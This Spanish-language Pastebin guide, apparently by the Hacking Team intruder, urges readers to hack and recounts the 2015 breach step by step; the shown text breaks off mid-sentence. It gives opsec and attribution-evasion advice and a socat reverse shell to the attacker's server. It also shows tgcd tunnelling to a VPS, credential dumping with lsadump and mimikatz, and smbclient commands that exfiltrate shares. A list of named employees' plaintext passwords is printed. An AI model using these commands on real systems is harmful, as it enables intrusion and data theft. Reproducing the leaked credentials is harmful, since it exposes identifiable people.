SHARE
TWEET

Hack Back! Una Guía DIY

a guest Apr 15th, 2016 53,235 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                 _   _            _      ____             _    _
  2.                | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
  3.                | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
  4.                |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
  5.                |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  6.                                                  
  7.                                  Una Guía DIY
  8.  
  9.  
  10.  
  11.                                  ,-._,-._            
  12.                               _,-\  o O_/;            
  13.                              / ,  `     `|            
  14.                              | \-.,___,  /   `        
  15.                               \ `-.__/  /    ,.\      
  16.                              / `-.__.-\`   ./   \'
  17.                             / /|    ___\ ,/      `\
  18.                            ( ( |.-"`   '/\         \  `
  19.                             \ \/      ,,  |          \ _
  20.                              \|     o/o   /           \.
  21.                               \        , /             /
  22.                               ( __`;-;'__`)            \\
  23.                               `//'`   `||`              `\
  24.                              _//       ||           __   _   _ _____   __
  25.                      .-"-._,(__)     .(__).-""-.      | | | | |_   _| |
  26.                     /          \    /           \     | | |_| | | |   |
  27.                     \          /    \           /     | |  _  | | |   |
  28.                      `'-------`      `--------'`    __| |_| |_| |_|   |__
  29.                                #antisec
  30.  
  31.  
  32.  
  33. --[ 1 - Introdución ]-----------------------------------------------------------
  34.  
  35. Notarás el cambio de idioma desde la ultima edición [1]. El mundo de habla
  36. inglesa ya tiene libros, charlas, guías, e información de sobra acerca de
  37. hacking. En ese mundo hay muchos hackers mejores que yo, pero por desgracia
  38. malgastan sus conocimientos trabajando para los contratistas de "defensa",
  39. para agencias de inteligencia, para proteger a los bancos y corporaciones y
  40. para defender el orden establecido. La cultura hacker nació en EEUU como una
  41. contracultura, pero ese origen se ha quedado en la mera estética - el resto ha
  42. sido asimilado. Al menos pueden llevar una camiseta, teñirse el pelo de azul,
  43. usar sus apodos hackers, y sentirse rebeldes mientras trabajan para el
  44. sistema.
  45.  
  46. Antes alguien tenía que colarse en las oficinas para filtrar documentos [2].
  47. Se necesitaba una pistola para robar un banco. Hoy en día puedes hacerlo desde
  48. la cama con un portátil en las manos [3][4]. Como dijo la CNT después del
  49. hackeo de Gamma Group: "intentaremos dar un paso más adelante con nuevas
  50. formas de lucha" [5]. El hackeo es una herramienta poderosa, ¡aprendamos y
  51. luchemos!
  52.  
  53. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  54. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  55. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  56. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  57. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
  58.  
  59.  
  60. --[ 2 - Hacking Team ]----------------------------------------------------------
  61.  
  62. Hacking Team era una empresa que ayudó a los gobiernos a hackear y espiar a
  63. periodistas, activistas, contrincantes políticos, y otras amenazas a su poder
  64. [1][2][3][4][5][6][7][8][9][10][11]. Y, muy de vez en cuando, a criminales y
  65. terroristas [12]. A Vincenzetti, el CEO, le gustaba terminar sus correos con
  66. el eslogan fascista "boia chi molla". Sería más acertado "boia chi vende RCS".
  67. También afirmaban tener tecnología para solucionar el "problema" de Tor y el
  68. darknet [13]. Pero visto que aún conservo mi libertad, tengo mis dudas acerca
  69. de su eficacia.
  70.  
  71. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  72. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  73. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  74. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  75. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  76. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  77. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  78. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  79. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  80. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  81. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
  82. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
  83. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
  84.  
  85.  
  86. --[ 3 - Tengan cuidado ahí fuera ]----------------------------------------------
  87.  
  88. Por desgracia, nuestro mundo está al revés. Te enriquece por hacer cosas malas
  89. y te encarcela por hacer cosas buenas. Afortunadamente, gracias al trabajo
  90. duro de gente como los de "Tor project" [1], puedes evitar que te metan en la
  91. cárcel mediante unas sencillas pautas:
  92.  
  93. 1) Cifra tu disco duro [2]
  94.  
  95.    Supongo que para cuando llegue la policía a incautar tu computadora,
  96.    significará que ya habrás cometido muchos errores, pero más vale prevenir
  97.    que curar.
  98.  
  99. 2) Usa una máquina virtual y enruta todo el tráfico por Tor
  100.  
  101.    Esto logra dos cosas. Primero, que todas las conexiones son anonimizadas a
  102.    través de la red Tor. Segundo, mantener la vida personal y la vida anónima
  103.    en computadoras diferentes te ayuda a no mezclarlas por accidente.
  104.  
  105.    Puedes usar proyectos como Whonix [3], Tails [4], Qubes TorVM [5], o algo
  106.    personalizado [6]. Aquí [7] hay una comparación detallada.
  107.  
  108. 3) (Opcional) No conectes directamente a la red Tor
  109.    
  110.    Tor no es la panacea. Se pueden correlacionar las horas que estás conectado
  111.    a Tor con las horas que está activo tu apodo hacker. También han habido
  112.    ataques con éxito contra la red [8]. Puedes conectar a la red Tor a través
  113.    del wifi de otros. Wifislax [9] es una distribución de linux con muchas
  114.    herramientas para conseguir wifi. Otra opción es conectar a un VPN o un
  115.    nodo puente [10] antes de Tor, pero es menos seguro porque aún así se
  116.    pueden correlacionar la actividad del hacker con la actividad del internet
  117.    de tu casa (esto por ejemplo fue usado como evidencia contra Jeremy Hammond
  118.    [11]).
  119.  
  120.    La realidad es que aunque Tor no es perfecto, funciona bastante bien.
  121.    Cuando era joven y temerario, hice muchas cosas sin nada de protección (me
  122.    refiero al hacking) aparte de Tor, que la policía hacía lo imposible por
  123.    investigar, y nunca he tenido problemas.
  124.  
  125.  
  126. [1] https://www.torproject.org/
  127. [2] https://info.securityinabox.org/es/chapter-4
  128. [3] https://www.whonix.org/
  129. [4] https://tails.boum.org/
  130. [5] https://www.qubes-os.org/doc/privacy/torvm/
  131. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
  132. [7] https://www.whonix.org/wiki/Comparison_with_Others
  133. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
  134. [9] http://www.wifislax.com/
  135. [10] https://www.torproject.org/docs/bridges.html.en
  136. [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
  137.  
  138.  
  139. ----[ 3.1 - Infraestructura ]---------------------------------------------------
  140.  
  141. No hackeo directamente con las relés de salida de Tor. Están en listas negras,
  142. van muy lentos, y no se pueden recibir conexiones inversas. Tor sirve para
  143. proteger mi anonimato mientras me conecto a la infraestructura que uso para
  144. hackear, la cual consta de:
  145.  
  146. 1) Nombres de dominio
  147.  
  148.    Sirve para direcciones de mando y control (C&C), y para hacer túneles de
  149.    DNS para egress asegurado.
  150.  
  151. 2) Servidores Estables
  152.  
  153.    Sirve para servidores C&C, para recibir shells inversas, para lanzar
  154.    ataques y para guardar el botín.
  155.  
  156. 3) Servidores Hackeados
  157.  
  158.    Sirven como pivotes para esconder la IP de los servidores estables, y para
  159.    cuando quiero una conexión rápida sin pivote. Por ejemplo escanear puertos,
  160.    escanear todo internet, descargar una base de datos con inyección de sql,
  161.    etc.
  162.  
  163. Obviamente hay que pagar de manera anónima, como bitcoin (si lo usas con
  164. cuidado).
  165.  
  166.  
  167. ----[ 3.2 - Atribución ]--------------------------------------------------------
  168.  
  169. A menudo sale en las noticias que han atribuido un ataque a un grupo de
  170. hackers gubernamentales (los "APTs"), porque siempre usan las mismas
  171. herramientas, dejan las mismas huellas, e incluso usan la misma
  172. infraestructura (dominios, correos etc). Son negligentes porque pueden hackear
  173. sin consecuencias legales.
  174.  
  175. No quería hacer más fácil el trabajo de la policía y relacionar lo de Hacking
  176. Team con los hackeos y apodos de mi trabajo cotidiano como hacker de guante
  177. negro. Así que usé servidores y dominios nuevos, registrado con correos nuevos
  178. y pagado con direcciones de bitcoin nuevas. Además, solo usé herramientas
  179. públicas y cosas que escribí especialmente para este ataque y cambié mi manera
  180. de hacer algunas cosas para no dejar mi huella forense normal.
  181.  
  182.  
  183. --[ 4 - Recabar Información ]---------------------------------------------------
  184.  
  185. Aunque puede ser tedioso, esta etapa es muy importante, porque cuanto más
  186. grande sea la superficie de ataque, más fácil será encontrar un fallo en una
  187. parte de la misma.
  188.  
  189.  
  190. ----[ 4.1 - Información Técnica ]-----------------------------------------------
  191.  
  192. Algunos herramientas y técnicas son:
  193.  
  194. 1) Google
  195.  
  196.    Se pueden encontrar muchas cosas inesperadas con un par de búsquedas bien
  197.    escogidas. Por ejemplo, la identidad de DPR [1]. La biblia de como usar
  198.    google para hackear es el libro "Google Hacking for Penetration Testers".
  199.    También puedes encontrar un breve resumen en español en [2].
  200.  
  201. 2) Enumeración de subdominios
  202.  
  203.    A menudo el dominio principal de una empresa está alojado por un tercero, y
  204.    vas a encontrar los rangos de IP de la empresa gracias a subdominios como
  205.    mx.company.com, ns1.company.com etc. Además, a veces hay cosas que no deben
  206.    estar expuestas en subdominios "ocultos".  Herramientas útiles para
  207.    descubrir dominios y subdominios son fierce [3], theHarvester [4], y
  208.    recon-ng [5].
  209.  
  210. 3) Búsquedas y búsquedas inversas de whois
  211.  
  212.    Con una búsqueda inversa usando la información whois de un dominio o rango
  213.    de IPs de una empresa, puedes encontrar otros de sus dominios y rangos de
  214.    IPs. Que yo sepa, no hay manera gratuita de hacer búsquedas inversas de
  215.    whois, aparte de un "hack" con google:
  216.    
  217.    "via della moscova 13" site:www.findip-address.com
  218.    "via della moscova 13" site:domaintools.com
  219.  
  220. 4) Escaneo de puertos y fingerprinting
  221.  
  222.    Diferente a las otras técnicas, esta habla con los servidores de la
  223.    empresa. Lo incluyo en esta sección porque no es un ataque, solo es para
  224.    recabar información. El IDS de la empresa puede generar una alerta al
  225.    escanear puertos, pero no tienes que preocuparte porque todo internet
  226.    está siendo escaneado constantemente.
  227.  
  228.    Para escanear, nmap [6] es preciso, y puede fingerprint la mayória de
  229.    servicios descubiertos. Para empresas con rangos de IPs muy largas,
  230.    zmap [7] o masscan [8] son rápidos. WhatWeb [9] o BlindElephant [10]
  231.    puede fingerprint sitios web.
  232.  
  233. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
  234. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
  235. [3] http://ha.ckers.org/fierce/
  236. [4] https://github.com/laramies/theHarvester
  237. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
  238. [6] https://nmap.org/
  239. [7] https://zmap.io/
  240. [8] https://github.com/robertdavidgraham/masscan
  241. [9] http://www.morningstarsecurity.com/research/whatweb
  242. [10] http://blindelephant.sourceforge.net/
  243.  
  244.  
  245. ----[ 4.2 - Información Social ]------------------------------------------------
  246.  
  247. Para la ingeniería social, es muy útil recabar información acerca de los
  248. empleados, sus roles, información de contacto, sistema operativo, navegador,
  249. plugins, software, etc. Algunos recursos son:
  250.  
  251. 1) Google
  252.  
  253.    Aquí también, es la herramienta más útil.
  254.  
  255. 2) theHarvester y recon-ng
  256.  
  257.    Ya las he mencionado en la sección anterior, pero tienen mucha más
  258.    funcionalidad. Pueden encontrar mucha información de forma rápida y
  259.    automatizada. Vale la pena leer toda su documentación.
  260.  
  261. 3) LinkedIn
  262.  
  263.    Se puede encontrar mucha información sobre los empleados aquí. Los
  264.    reclutadores de la empresa son los más propensos a aceptar tus solicitudes.
  265.  
  266. 4) Data.com
  267.  
  268.    Antes conocido como jigsaw. Tiene la información de contacto de muchos
  269.    empleados.
  270.  
  271. 5) Metadatos de los archivos
  272.  
  273.    Se puede encontrar mucha información sobre los empleados y sus sistemas en
  274.    los metadatos de archivos que la empresa ha publicado. Herramientas útiles
  275.    para encontrar archivos en el sitio web de la empresa y extraer los
  276.    metadatos son metagoofil [1] y FOCA [2].
  277.  
  278. [1] https://github.com/laramies/metagoofil
  279. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
  280.  
  281.  
  282. --[ 5 - Entrando en la Red ]----------------------------------------------------
  283.  
  284. Hay varias maneras de hacer la entrada. Ya que el método que usé para hacking
  285. team es poco común y mucho más trabajoso de lo que normalmente es necesario,
  286. voy a hablar un poco de los dos métodos más comunes, que recomiendo intentar
  287. primero.
  288.  
  289.  
  290. ----[ 5.1 - Ingeniería Social ]-------------------------------------------------
  291.  
  292. Ingeniería social, específicamente spear phishing, es responsable de la
  293. mayoría de los hackeos hoy día. Para una introducción en español, véase [1].
  294. Para más información en inglés, véase [2] (la tercera parte, "Targeted
  295. Attacks").  Para anécdotas divertidas de ingeniería social de las generaciones
  296. pasadas, véase [3]. No quería intentar spear phishing contra Hacking Team,
  297. porque su negocio es ayudar a los gobiernos a spear phish a sus opositores.
  298. Por lo tanto hay un riesgo mucho más alto de que Hacking Team reconozca y
  299. investigue dicho intento.
  300.  
  301. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
  302. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
  303. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
  304.  
  305.  
  306. ----[ 5.2 - Comprar Acceso ]----------------------------------------------------
  307.  
  308. Gracias a rusos laboriosos y sus exploit kits, traficantes de tráfico, y
  309. pastores de bots, muchas empresas ya tienen computadoras comprometidas dentro
  310. de sus redes. Casi todos los Fortune 500, con sus enormes redes, tienen unos
  311. bots ya adentro. Sin embargo, Hacking Team es una empresa muy pequeña, y la
  312. mayoría de los empleados son expertos en seguridad informática, entonces había
  313. poca probabilidad de que ya estuvieran comprometidas.
  314.  
  315.  
  316. ----[ 5.3 - Explotación Técnica ]-----------------------------------------------
  317.  
  318. Después del hackeo de Gamma Group, describí un proceso para buscar
  319. vulnerabilidades [1]. Hacking Team tiene un rango de IP pública:
  320. inetnum:        93.62.139.32 - 93.62.139.47
  321. descr:          HT public subnet
  322.  
  323. Hacking Team tenía muy poco expuesto al internet. Por ejemplo, diferente a
  324. Gamma Group, su sitio de atención al cliente necesita un certificado del
  325. cliente para conectar. Lo que tenía era su sitio web principal (un blog Joomla
  326. en que Joomscan [2] no revela ningún fallo grave), un servidor de correos, un
  327. par de routers, dos dispositivos VPN, y un dispositivo para filtrar spam.
  328. Entonces tuve tres opciones: buscar un 0day en Joomla, buscar un 0day en
  329. postfix, o buscar un 0day en uno de los sistemas embebidos. Un 0day en un
  330. sistema embebido me pareció la opción más alcanzable, y después de dos semanas
  331. de trabajo de ingeniería inversa, logré un exploit remoto de root. Dado que
  332. las vulnerabilidades aún no han sido parcheadas, no voy a dar más detalles.
  333. Para más información sobre como buscar este tipo de vulnerabilidades, véase
  334. [3] y [4].
  335.  
  336. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  337. [2] http://sourceforge.net/projects/joomscan/
  338. [3] http://www.devttys0.com/
  339. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
  340.  
  341.  
  342. --[ 6 - Estar Preparado ]-------------------------------------------------------
  343.  
  344. Hice mucho trabajo y pruebas antes de usar el exploit contra Hacking Team.
  345. Escribí un firmware con backdoor, y compilé varias herramientas de
  346. post-explotación para el sistema embebido. El backdoor sirve para proteger el
  347. exploit. Usar el exploit sólo una vez y después volviendo por el backdoor hace
  348. más difícil el trabajo de descubrir y parchear las vulnerabilidades.
  349.  
  350. Las herramientas de post-explotación que había preparado eran:
  351.  
  352. 1) busybox
  353.  
  354.    Para todas las utilidades comunes de UNIX que el sistema no tuvo.
  355.  
  356. 2) nmap
  357.  
  358.    Para escanear y fingerprint la red interna de Hacking Team.
  359.  
  360. 3) Responder.py
  361.  
  362.    La herramienta más útil para atacar a redes Windows cuando tienes acceso a
  363.    la red interna pero no tienes un usuario de dominio.
  364.  
  365. 4) Python
  366.  
  367.    Para ejecutar Responder.py
  368.  
  369. 5) tcpdump
  370.  
  371.    Para husmear tráfico.
  372.  
  373. 6) dsniff
  374.  
  375.    Para espiar contraseñas de protocolos débiles como ftp, y para hacer
  376.    arpspoofing. Quería usar ettercap, escrito por los mismos ALoR y NaGA de
  377.    Hacking Team, pero era difícil compilarlo para el sistema.
  378.  
  379. 7) socat
  380.  
  381.    Para un shell cómodo con pty:
  382.    mi_servidor: socat file:`tty`,raw,echo=0 tcp-listen:mi_puerto
  383.    sistema hackeado: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
  384.                 tcp:mi_servidor:mi_puerto
  385.  
  386.    Y para muchas cosas más, es una navaja suiza de redes. Véase la sección de
  387.    ejemplos de su documentación.
  388.  
  389. 8) screen
  390.  
  391.    Como los pty de socat, no es estrictamente necesario, pero quería sentirme
  392.    como en casa en las redes de Hacking Team.
  393.  
  394. 9) un servidor proxy SOCKS
  395.  
  396.    Para usar junto a proxychains para acceder a la red interna con cualquier
  397.    otro programa.
  398.  
  399. 10) tgcd
  400.  
  401.    Para reenviar puertos, como lo del servidor SOCKS, a través del firewall.
  402.  
  403. [1] https://www.busybox.net/
  404. [2] https://nmap.org/
  405. [3] https://github.com/SpiderLabs/Responder
  406. [4] https://github.com/bendmorris/static-python
  407. [5] http://www.tcpdump.org/
  408. [6] http://www.monkey.org/~dugsong/dsniff/
  409. [7] http://www.dest-unreach.org/socat/
  410. [8] https://www.gnu.org/software/screen/
  411. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
  412. [10] http://tgcd.sourceforge.net/
  413.  
  414.  
  415. Lo peor que podía pasar era que mi backdoor o herramientas de post-explotación
  416. dejasen inestable el sistema e hicieran que un empleado lo investigase.  Por
  417. lo tanto, pasé una semana probando mi exploit, backdoor, y herramientas de
  418. post-explotación en las redes de otras empresas vulnerables antes de entrar en
  419. la red de Hacking Team.
  420.  
  421.  
  422. --[ 7 - Observar y Escuchar ]---------------------------------------------------
  423.  
  424. Ahora dentro de la red interna, quiero echar un vistazo y pensar antes de dar
  425. el próximo paso. Enciendo Responder.py en modo análisis (-A, para escuchar sin
  426. respuestas envenenadas), y hago un escaneo lento con nmap.
  427.  
  428.  
  429. --[ 8 - Bases de Datos NoSQL ]--------------------------------------------------
  430.  
  431. NoSQL, o más bien NoAutenticación, ha sido un gran regalo a la comunidad
  432. hacker [1]. Cuando me preocupo de que por fin han parcheado todo los fallos de
  433. omisión de autenticación en MySQL [2][3][4][5], se ponen de moda nuevas bases
  434. de datos sin autenticación por diseño. Nmap encuentra unos pocos en la red
  435. interna de Hacking Team:
  436.  
  437. 27017/tcp open  mongodb       MongoDB 2.6.5
  438. | mongodb-databases:
  439. |   ok = 1
  440. |   totalSizeMb = 47547
  441. |   totalSize = 49856643072
  442. ...
  443. |_    version = 2.6.5
  444.  
  445. 27017/tcp open  mongodb       MongoDB 2.6.5
  446. | mongodb-databases:
  447. |   ok = 1
  448. |   totalSizeMb = 31987
  449. |   totalSize = 33540800512
  450. |   databases
  451. ...
  452. |_    version = 2.6.5
  453.  
  454. Fueron las bases de datos para instancias de prueba de RCS. El audio que graba
  455. RCS es guardado en MongoDB con GridFS. La carpeta audio en el torrent [6]
  456. viene de esto. Se espiaban sin querer a sí mismos.
  457.  
  458. [1] https://www.shodan.io/search?query=product%3Amongodb
  459. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
  460. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
  461. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
  462. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
  463. [6] https://ht.transparencytoolkit.org/audio/
  464.  
  465.  
  466. --[ 9 - Cables Cruzados ]-------------------------------------------------------
  467.  
  468. Aunque fue divertido escuchar grabaciones y ver imágenes webcam de Hacking
  469. Team desarrollando su malware, no fue muy útil. Sus inseguras copias de
  470. seguridad fueron la vulnerabilidad que abrieron sus puertas. Según su
  471. documentación [1], sus dispositivos iSCSI deben estar en una red aparte,
  472. pero nmap encuentra unos en su subred 192.168.1.200/24:
  473.  
  474. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
  475. ...
  476. 3260/tcp open  iscsi?
  477. | iscsi-info:
  478. |   Target: iqn.2000-01.com.synology:ht-synology.name
  479. |     Address: 192.168.200.66:3260,0
  480. |_    Authentication: No authentication required
  481.  
  482. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
  483. ...
  484. 3260/tcp open  iscsi?
  485. | iscsi-info:
  486. |   Target: iqn.2000-01.com.synology:synology-backup.name
  487. |     Address: 10.0.1.72:3260,0
  488. |     Address: 192.168.200.72:3260,0
  489. |_    Authentication: No authentication required
  490.  
  491. iSCSI necesita un modúlo de núcleo, y hubiese sido difícil compilarlo para el
  492. sistema embebido. Reenvié el puerto para montarlo desde un VPS:
  493.  
  494. VPS: tgcd -L -p 3260 -q 42838
  495. Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
  496.  
  497. VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
  498.  
  499. Ahora iSCSI encuentra el nombre iqn.2000-01.com.synology pero tiene problemas
  500. a la hora de montarlo porque cree que su dirección es 192.168.200.72 en vez de
  501. 127.0.0.1
  502.  
  503. La manera en que la solucioné fue:
  504. iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
  505.  
  506. Y ahora después de:
  507. iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
  508.  
  509. ...el archivo de dispositivo aparece! Lo montamos:
  510. vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
  511.  
  512. y encontramos copias de seguridad de varias máquinas virtuales. El servidor de
  513. Exchange parece lo más interesante. Es demasiado grande como para descargarlo,
  514. pero podemos montarlo remoto y buscar archivos interesantes:
  515. $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
  516. $ fdisk -l /dev/loop0
  517. /dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT
  518.  
  519. entonces el offset es 2048 * 512 = 1048576
  520. $ losetup -o 1048576 /dev/loop1 /dev/loop0
  521. $ mount -o ro /dev/loop1 /mnt/exchange/
  522.  
  523. ahora en /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
  524. encontramos el disco duro de la máquina virtual, y lo montamos:
  525. vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
  526. mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
  527.  
  528. ... y por fin hemos desempaquetado la muñeca rusa y podemos ver todos los
  529. archivos del antiguo servidor Exchange en /mnt/part1
  530.  
  531. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
  532.  
  533.  
  534. --[ 10 - De Copia de Seguridad a Administrador de Dominio ]---------------------
  535.  
  536. Lo que más me interesa de la copia de seguridad es buscar si tiene una
  537. contraseña o hash que pueda usar para acceder al servidor actual. Uso pwdump,
  538. cachedump, y lsadump [1] con los archivos del registro. lsadump encuentra la
  539. contraseña de la cuenta de servicio besadmin:
  540.  
  541. _SC_BlackBerry MDS Connection Service
  542. 0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  543. 0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
  544. 0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........
  545.  
  546. Uso proxychains [2] con el servidor socks en el sistema embebido y
  547. smbclient [3] para comprobar la contraseña:
  548. proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
  549.  
  550. !Funciona! La contraseña de besadmin aún es válida, y es un administrador
  551. local. Uso mi proxy y psexec_psh de metasploit [4] para conseguir una sesión
  552. de meterpreter. A continuación migro a un proceso de 64 bits, "load kiwi" [5],
  553. "creds_wdigest", y ya tengo muchas contraseñas, incluso la del administrador
  554. del dominio:
  555.  
  556. HACKINGTEAM  BESAdmin       bes32678!!!
  557. HACKINGTEAM  Administrator  uu8dd8ndd12!
  558. HACKINGTEAM  c.pozzi        P4ssword      <---- ¡vaya sysadmin!
  559. HACKINGTEAM  m.romeo        ioLK/(90
  560. HACKINGTEAM  l.guerra       4luc@=.=
  561. HACKINGTEAM  d.martinez     W4tudul3sp
  562. HACKINGTEAM  g.russo        GCBr0s0705!
  563. HACKINGTEAM  a.scarafile    Cd4432996111
  564. HACKINGTEAM  r.viscardi     Ht2015!
  565. HACKINGTEAM  a.mino         A!e$$andra
  566. HACKINGTEAM  m.bettini      Ettore&Bella0314
  567. HACKINGTEAM  m.luppi        Blackou7
  568. HACKINGTEAM  s.gallucci     1S9i8m4o!
  569. HACKINGTEAM  d.milan        set!dob66
  570. HACKINGTEAM  w.furlan       Blu3.B3rry!
  571. HACKINGTEAM  d.romualdi     Rd13136f@#
  572. HACKINGTEAM  l.invernizzi   L0r3nz0123!
  573. HACKINGTEAM  e.ciceri       2O2571&2E
  574. HACKINGTEAM  e.rabe         erab@4HT!
  575.  
  576. [1] https://github.com/Neohapsis/creddump7
  577. [2] http://proxychains.sourceforge.net/
  578. [3] https://www.samba.org/
  579. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
  580. [5] https://github.com/gentilkiwi/mimikatz
  581.  
  582.  
  583. --[ 11 - Descargando los Correos ]-----------------------------------------------
  584.  
  585. Ahora que tengo la contraseña del administrador del dominio, tengo acceso a
  586. los correos, el corazón de la empresa. Ya que con cada paso que doy hay un
  587. riesgo de detección, descargo los correos antes de seguir explorando.
  588. Powershell hace que sea fácil [1]. Curiosamente, encontré un bug con el manejo
  589. de fechas.  Después de conseguir los correos, me demoró un par de semanas en
  590. conseguir el código fuente y lo demás, así que regresé de vez en cuando para
  591. descargar los correos nuevos.  El servidor era italiano, con las fechas en el
  592. formato día/mes/año. Uso:
  593. -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
  594.  
  595. con el New-MailboxExportRequest para descargar los correos nuevos (en este
  596. caso todos los correos a partir del día 5 de junio. El problema es que dice
  597. que la fecha es inválida si el día es mayor que 12 (imagino que esto se debe a
  598. que en EEUU el mes está primero y no puede ser un mes mayor que 12).  Parece
  599. que los ingenieros de Microsoft solo han probado su software con su propia
  600. configuración regional.
  601.  
  602. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
  603.  
  604.  
  605. --[ 12 - Descargando Archivos ]-------------------------------------------------
  606.  
  607. Ahora que soy un administrador del dominio, también empecé a descargar los
  608. recursos compartidos usando mi proxy y la opción -Tc de smbclient, por
  609. ejemplo:
  610.  
  611. proxychains smbclient '//192.168.1.230/FAE DiskStation' \
  612.     -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
  613.  
  614. Así descargué las carpetas Amministrazione, FAE DiskStation, y FileServer en
  615. el torrent.
  616.  
  617.  
  618. --[ 13 - Introducción al Hacking de Dominios de Windows ]-----------------------
  619.  
  620. Antes de seguir contando la historia de los weones culiaos, cabe decir algo de
  621. conocimiento para atacar a redes de Windows.
  622.  
  623.  
  624. ----[ 13.1 - Movimiento Lateral ]-----------------------------------------------
  625.  
  626. Voy a dar un breve repaso a las técnicas para propagarse dentro de una red de
  627. Windows. Las técnicas para ejecutar de forma remota requieren la contraseña o
  628. hash de un administrador local en el objetivo. Con mucho, la manera más común
  629. de conseguir dichas credenciales es usar mimikatz [1], sobre todo
  630. sekurlsa::logonpasswords y sekurlsa::msv, en las computadoras donde ya tienes
  631. acceso administrativo. Las técnicas de movimiento "in situ" también requiren
  632. privilegios administrativos (salvo por runas). Las herramientas más
  633. importantes para escalada de privilegios son PowerUp [2], y bypassuac [3].
  634.  
  635. [1] https://adsecurity.org/?page_id=1821
  636. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
  637. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
  638.  
  639.  
  640. Movimiento Remoto:
  641.  
  642. 1) psexec
  643.  
  644.    La manera básica y probada de movimiento en redes de windows. Puedes usar
  645.    psexec [1], winexe [2], psexec_psh de metasploit [3], invoke_psexec de
  646.    powershell empire [4], o el comando de windows "sc" [5]. Para el módulo de
  647.    metasploit, powershell empire, y pth-winexe [6], basta con saber el hash
  648.    sin saber la contraseña. Es la manera más universal (funciona en cualquier
  649.    computadora con puerto 445 abierto), pero también la manera menos
